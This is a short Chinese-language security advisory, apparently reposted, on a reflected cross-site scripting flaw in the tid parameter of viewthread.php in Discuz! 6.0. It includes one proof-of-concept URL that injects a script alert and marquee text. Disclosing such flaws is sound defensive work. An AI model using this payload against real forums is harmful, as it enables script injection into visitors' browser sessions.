Discuz!论坛tid参数跨站脚本漏洞

受影响系统:

Discuz! Discuz! 6.0

描述:


BUGTRAQ  ID: 37982

Discuz!是一款华人地区非常流行的Web论坛程序。

Discuz!没有正确的地过滤提交给viewthread.php页面的tid参数便返回给了用户,远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击,导致在用户浏览器会话中注入并执行任意HTML和脚本代码。

<*来源:s4r4d0
  
  链接:http://secunia.com/advisories/38279/
*>

测试方法:


警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/bbs/viewthread.php?tid="&gt;&gt;&lt;script&gt;alert(HACKED BY FATAL ERROR)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS By Fatal Error&lt;/h1&gt;&lt;/marquee&gt;

建议:


厂商补丁:

Discuz!
——-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.discuz.net/

发表评论?

0 条评论。

发表评论